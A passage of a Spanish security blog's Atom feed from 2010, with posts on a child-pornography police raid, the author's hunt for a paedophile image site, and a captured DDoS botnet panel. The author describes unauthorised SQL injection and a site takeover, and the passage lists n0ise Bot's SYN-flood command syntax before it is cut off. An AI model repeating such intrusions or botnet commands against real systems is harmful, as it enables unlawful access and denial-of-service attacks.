sans-serif; font-size: 14px; line-height: 20px;"&gt;El resultado fue el siguiente: en el transcurso de la investigación se analizaron más de 20.000 conexiones y se seleccionó exclusivamente aquellas conexiones de usuarios que se hubiesen descargado en su totalidad los archivos ilícitos con un nombre que aludiera específicamente a material pornográfico infantil.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Se identificaron a 125 usuarios ubicados en España y que estaban distribuyendo los archivos investigados disponibles en la red y cuyas conexiones se encontraban asociadas a proveedores de acceso a internet también situados aquí.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;Cada identificado se había descargado en sus equipos informáticos varios archivos de contenido pedófilo de extrema dureza, como agresiones sexuales a menores de muy corta edad, y los habían puesto a disposición de la red.&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;La mayor parte de las detenciones se han practicado en el País Vasco, Andalucía y Cataluña, con diez arrestos en cada una de las Comunidades, además de ocho en la Valenciana, siete en la de Madrid, tres en Castilla-La Mancha y en Cantabria, dos en Aragón y uno en Murcia, Asturias, Canarias y Extremadura&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;La "ciber-redada" se ha desarrollado en menos de tres días en los que se han practicado casi un centenar de registros: Álava (3), Alicante (1), Almería (1), Asturias (2), Badajoz (1), Barcelona (16), Cáceres (2), Cádiz (7), Cantabria (5), Castellón (1), Ciudad Real (1), Cuenca (1), Gerona (1), Granada (1), Guipúzcoa (4), Huelva (2),La Rioja (2), Las Palmas (2), Lérida (1), Madrid (11), Málaga (2), Murcia (1), Palma de Mallorca (2) y Pontevedra (3).&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 20px;"&gt;También en Sevilla (1), Tarragona (1), Teruel (1), Toledo (2), Valencia (12), Valladolid (1),Vizcaya (5), Zaragoza (1).&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-6922412055922580940?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='enclosure' type='text/html' href='http://www.heraldo.es/noticias/nacional/un_centenar_detenidos_imputados_una_redada_contra_pornografia_infantil.html' length='0'/><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/6922412055922580940/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=6922412055922580940' title='8 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6922412055922580940'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/6922412055922580940'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/10/muy-bien-por-la-bit.html' title='¡¡ Muy bien por la BIT !!'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/TK740HeFwBI/AAAAAAAACUM/1p6nDxolqL0/s72-c/Captura.JPG' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-7951547291620544165</id><published>2010-10-06T11:06:00.000+02:00</published><updated>2010-10-06T11:06:40.280+02:00</updated><title type='text'>¿Donde estás lolisex? (Parte I)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TKw7yr-XANI/AAAAAAAACUI/vyZumKZUtRc/s1600/abuso-menores.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="126" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TKw7yr-XANI/AAAAAAAACUI/vyZumKZUtRc/s200/abuso-menores.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola Lectores,&lt;br /&gt;&lt;br /&gt;Carlos es una persona aparentemente normal, que en su vida hace las cosas que hacemos todas las personas normales, trabaja cerca de donde trabajas tú y es vecino de tu barrio, es amable, educado y culto, con unos ingresos medio-altos y es posible que hasta lo hayas saludado más de una vez. Pero la realidad a veces supera la&amp;nbsp;ficción&amp;nbsp;&lt;b&gt;Carlos realmente es&lt;/b&gt; &lt;b&gt;Lolisex &lt;/b&gt;un sujeto de aproximadamente 35 años, es un depredador sexual, que utiliza las redes sociales como medio de caza, también utiliza diversas personalidades, edades y sexos, su orientación sexual como el se define es 'amante de niños' conocido en el ambiente como 'BoyLovers'&lt;br /&gt;&lt;br /&gt;Hoy voy a contar un caso, que todavía está en investigación, pero que considero importante para que si algunos/as &amp;nbsp;os pasa, por favor lo&amp;nbsp;denunciéis. (En algunas de mis charlas lo suelo contar)&lt;br /&gt;&lt;br /&gt;Como os&amp;nbsp;habréis&amp;nbsp;imaginado, he cambiado nombres y direcciones IP's, todo lo&amp;nbsp;demás&amp;nbsp;está en la denuncia.&lt;br /&gt;&lt;br /&gt;Antes quiero aclarar como se pronuncian en España las leyes y voy a aclarar que es la pornografía infantil.&lt;br /&gt;&lt;br /&gt;Se denomina pornografía infantil a toda representación de menores de edad de cualquier sexo en conductas sexualmente explícitas. Puede tratarse de representaciones visuales, descriptivas (por ejemplo en ficción) o incluso sonoras.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En España, según artíulo 189.1.a del Código Penal, se establece pena de prisión para "El que utilizare a menores de edad o a incapaces con fines o en espectáculos exhibicionistas o pornográficos, tanto públicos como privados, o para elaborar cualquier clase de material pornográfico, cualquiera que sea su soporte, o financiare cualquiera de estas actividades.". Sin embargo, en el punto segundo del citado artículo, se establece asimismo pena de prisión o multa por la sola posesión de material pornográfico, aunque cita para su propio uso, lo cual establece dudas sobre la voluntariedad de la posesión, y tampoco especifica si esto es aplicable a todo tipo de material y a todo tipo de soporte o formato.&lt;br /&gt;&lt;br /&gt;Del artículo 189.7 puede interpretarse que la pornografía infantil no foto/vídeográfica (dibujos, animaciones) no es ilegal en España mientras no se hayan utilizado las imágenes o voz modificadas de un menor&lt;br /&gt;&lt;br /&gt;&lt;b&gt;LOLISEX&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Lolisex es un 'pájaro' pederasta que en mi&amp;nbsp;opinión&amp;nbsp;personal, vende&amp;nbsp;pornografía&amp;nbsp;infantil, o como&amp;nbsp;mínimo&amp;nbsp;trafica con ello.&lt;br /&gt;&lt;br /&gt;Vamos a ver como lo&amp;nbsp;descubrimos:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nuestra herramienta Spectum&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Recibimos un correo en nuestro Honey-Spam (lo llamamos spectum). Este es un servidor con relay abierto y en el cual corre una aplicación que en base a una&amp;nbsp;lógica y como parámetros de unos&amp;nbsp;determinados 'strings' conseguimos obtener una copia del correo para su posterior análisis. Nuestro objetivo es monitorizar posibles phisings cuyo destino son los usuarios de entidades financieras. Aunque nuestro producto es primitivo (tiembla proyecto &lt;a href="http://es.wikipedia.org/wiki/ECHELON"&gt;echelon&lt;/a&gt;) &amp;nbsp;hemos conseguido añadir funcionalidades como temas de pornografía infantil y&amp;nbsp;últimamente estamos practicando con temas de terrorismo.&lt;br /&gt;&lt;br /&gt;Como os iba diciendo recibimos este correo:&lt;br /&gt;&lt;br /&gt;&lt;span id="goog_1381278768"&gt;&lt;/span&gt;&lt;span id="goog_1381278769"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TKm9-rSEyOI/AAAAAAAACTI/RLoblLeRn50/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="292" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TKm9-rSEyOI/AAAAAAAACTI/RLoblLeRn50/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Como podemos apreciar en color amarillo, se anuncia algo parecido a comercializar con vídeos de niños y en la parte inferior tenemos una web como referencia. ¿que será esa web? salgamos de dudas.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TKnBle8rtWI/AAAAAAAACTM/0qjx-Sfgpxw/s1600/Captura1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="161" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TKnBle8rtWI/AAAAAAAACTM/0qjx-Sfgpxw/s400/Captura1.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bueno, todo apunta a una bonita página alojada en un hosting en Rusia, donde se pueden subir imágenes, como no ofrece mucha información, voy a mirar por encima, es decir el hosting en si, proveedor, directorios virtuales, ficheros de configuración etc. Para ello voy a utilizar la herramienta DIRB, desarrollada por Ramón conocido en el mundillo de la seguridad como&amp;nbsp;&lt;a href="http://www.open-labs.org/"&gt;darkraver&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Este es el resultado que nos llevo al descubrimiento:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TKrwnprAx5I/AAAAAAAACTU/mN5nhxI2Ues/s1600/Capturame.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="275" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TKrwnprAx5I/AAAAAAAACTU/mN5nhxI2Ues/s400/Capturame.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Tenemos un directorio de nombre "pappusi", lo más interesante de todo es que tenemos evidencias de ficheros dentro del directorio con alto contenido sexual y además visibles , es decir el servidor web Apache, no tiene la clausula "Options -Indexes" activada (vaya cagada del administrador).&lt;br /&gt;&lt;br /&gt;Vamos a comprobarlo.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TKr1Zw-dj9I/AAAAAAAACTc/1PG0S0vQ58s/s1600/Capturame.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TKr1Zw-dj9I/AAAAAAAACTc/1PG0S0vQ58s/s400/Capturame.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Esta foto es de las más normales, pero vimos algunas de miedo.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Revisando los directorios virtuales y diversos ficheros nos vamos dando cuenta que hay foros (álbum) protegidos por contraseña, la cuestión es como nos podemos hacer con uno de estos, para poder ver la información que contiene.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKr2n1mWLAI/AAAAAAAACTg/eWWVqcv-PHA/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="89" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKr2n1mWLAI/AAAAAAAACTg/eWWVqcv-PHA/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;Después&amp;nbsp;de varias revisiones sin&amp;nbsp;éxito, nos proponemos pasar a la acción. ¿Probamos con un SQL Inyection? La probabilidad de que tenga MySQL es alta dado que está desarrollado en PHP, vamos aprobar aleatoriamente...con algunos&amp;nbsp;comandos&amp;nbsp;y.......&lt;br /&gt;&lt;br /&gt;OOOPSS!!! ¡¡PREMIO!!&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKsN7dIVyXI/AAAAAAAACTo/nCHW9KhpWoY/s1600/Capturame.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="82" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKsN7dIVyXI/AAAAAAAACTo/nCHW9KhpWoY/s400/Capturame.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bueno, a partir de aquí, solo os&amp;nbsp;diré&amp;nbsp;que nos hicimos con las contraseñas de las bases de datos y pudimos entrar a la mayoría de los foros.&lt;br /&gt;&lt;br /&gt;Ni que decir tiene como se lo montan estos pederastas, hay un foro en particular que solo hay imágenes con &amp;nbsp;poses de niñas modelo, en algún caso con autorización de los padres (¿un padre hace eso con su hija?). Desgraciadamente en esta vida, siempre hay desgraciados que a sus vez desgracian a sus hijos.&lt;br /&gt;&lt;br /&gt;Aquí&amp;nbsp;tenéis&amp;nbsp;un ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TKsQE6qwGyI/AAAAAAAACTw/RjaubG6WIb4/s1600/Captura1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TKsQE6qwGyI/AAAAAAAACTw/RjaubG6WIb4/s320/Captura1.JPG" width="245" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Mirando el listado de foros nos sorprende estos que están en Español (con contraseña)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKw1fOleq_I/AAAAAAAACT4/ZsLcCy55de8/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="67" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKw1fOleq_I/AAAAAAAACT4/ZsLcCy55de8/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Una vez dentro de uno de ellos nos encontramos con muchas imágenes de este tipo&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKw21M0RdqI/AAAAAAAACUA/7hySuPCvM48/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TKw21M0RdqI/AAAAAAAACUA/7hySuPCvM48/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Y al final de las imágenes comentarios sobre la foto y como&amp;nbsp;podréis&amp;nbsp;apreciar hay un tipo con la bandera de España. ¡¡ Vamos a por el !!.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TKw36c7ErTI/AAAAAAAACUE/hB_w_dcbwr8/s1600/Captura1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="126" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TKw36c7ErTI/AAAAAAAACUE/hB_w_dcbwr8/s400/Captura1.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Como se puede apreciar disponemos de una dirección IP, de dos cuentas de correo, fechas y hora. Con esa información vamos a sacar su perfil, su registro y por donde se mueve este&amp;nbsp;pájaro y donde tiene el nido.&lt;br /&gt;&lt;br /&gt;En la siguiente entrega veremos su blog y sitios que frecuenta y como con un poco de&amp;nbsp;ingeniería&amp;nbsp;social conseguimos identificarlo y atraparlo...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-7951547291620544165?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/7951547291620544165/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=7951547291620544165' title='27 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7951547291620544165'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7951547291620544165'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/10/donde-estas-lolisex-parte-i.html' title='¿Donde estás lolisex? (Parte I)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_7dOLVYBL8vA/TKw7yr-XANI/AAAAAAAACUI/vyZumKZUtRc/s72-c/abuso-menores.jpg' height='72' width='72'/><thr:total>27</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-198246176792079330</id><published>2010-09-23T12:29:00.004+02:00</published><updated>2010-09-23T13:43:01.821+02:00</updated><title type='text'>En primera Línea de fuego</title><content type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hacking-avanzado.blogspot.com/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Eduardo&lt;/span&gt;&lt;/a&gt;&amp;nbsp;y yo, estuvimos visitando a los colegas de la Brigada de Investigación&amp;nbsp;Tecnológica y&amp;nbsp;&amp;nbsp;al Grupo de Delitos Telemáticos de la Guardia Civil.&lt;br /&gt;&lt;br /&gt;Como ya&amp;nbsp;veníamos&amp;nbsp;diciendo en diferentes post, en España hay muy buenos profesionales en el mundo de la seguridad y casi siempre estamos hablando y entendiendo que están en la empresa privada, o bien como freelance, pero no hay que olvidarse de las personas que están en la línea de fuego, aquellas cuyo servicio y objetivo es proteger a las personas y perseguir el delito en la red&lt;br /&gt;&lt;br /&gt;Hoy quiero destacar la gran experiencia que tienen los componentes de la BIT y GDT. Ellos son la primera línea, muy profesionales y técnicamente están a muy alto nivel.&amp;nbsp;Podríamos&amp;nbsp;decir que estamos en muy buenas manos y si yo fuera el delincuente, el pederasta o el criminal, estaría cagado de miedo con estos compañeros.&lt;br /&gt;&lt;br /&gt;Os dejo alguna foto de nuestra visita.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;BRIGADA DE&amp;nbsp;INVESTIGACIÓN&amp;nbsp;TECNOLÓGICA (BIT)&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TJs9GRpEtyI/AAAAAAAACSw/CjeSyOHO-b0/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="239" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TJs9GRpEtyI/AAAAAAAACSw/CjeSyOHO-b0/s320/1.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TJs9H04EWGI/AAAAAAAACS0/dXsJrBRfR00/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="239" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TJs9H04EWGI/AAAAAAAACS0/dXsJrBRfR00/s320/2.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&amp;nbsp;&lt;b&gt;GRUPO DE DELITOS TELEMÁTICOS DE LA GUARDIA CIVIL (GDT)&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJs9I872KEI/AAAAAAAACS4/u_v2Jpj4jBk/s1600/3(2).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="239" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJs9I872KEI/AAAAAAAACS4/u_v2Jpj4jBk/s320/3(2).JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-198246176792079330?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/198246176792079330/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=198246176792079330' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/198246176792079330'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/198246176792079330'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/09/en-primera-linea-de-fuego.html' title='En primera Línea de fuego'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/TJs9GRpEtyI/AAAAAAAACSw/CjeSyOHO-b0/s72-c/1.JPG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-354044441885274504</id><published>2010-09-20T12:24:00.000+02:00</published><updated>2010-09-20T12:24:11.575+02:00</updated><title type='text'>¡¡ Vendo Botnets baratas, Señoras y Señores...!!!</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJc2CFZEYKI/AAAAAAAACSM/WMqX_DN0lw0/s1600/tombstone.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TJc2CFZEYKI/AAAAAAAACSM/WMqX_DN0lw0/s320/tombstone.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;A raíz del último ataque de denegación de servicio (ddos) que recibimos y que afortunadamente no llego a mayores, me dio por pensar y por pensar mal.&lt;/div&gt;&lt;br /&gt;Todo esto viene al caso de lo siguiente, el otro día apareció por nuestros 'tarritos de miel' una curiosa mosca, a la que seguimos la pista hasta ver por donde vivía y nos encontramos con un sitio web que contenía un curioso panel de control . Tras 'poseer' el sitio web a través de una vulnerabilidad (que tiene el proveedor ruso que aloja las páginas) pudimos analizar en profundidad su contenido.&lt;br /&gt;&lt;br /&gt;Basicamente este es así:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TJcf-RAHbgI/AAAAAAAACR0/ZCoHhLmItH0/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TJcf-RAHbgI/AAAAAAAACR0/ZCoHhLmItH0/s400/Captura.JPG" width="340" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Y este su acceso vía web (se ha ocultado la URL por motivos de seguridad)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TJOgml83qPI/AAAAAAAACRk/xxEqpMGNpBs/s1600/Captura1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="127" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TJOgml83qPI/AAAAAAAACRk/xxEqpMGNpBs/s400/Captura1.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Se trata de &lt;b&gt;n0ise Bot&lt;/b&gt;, un software diseñado exclusivamente para reclutar zombis y ejecutar ataques de denegación de servicio distribuida. Mirando lo que hace vemos que los&amp;nbsp;comandos que pueden ser empleados a través de la configuración de este malware son los siguientes:&lt;br /&gt;&lt;br /&gt;Syn-Flood - synflood*Host*Port*Threads*Sockets&lt;br 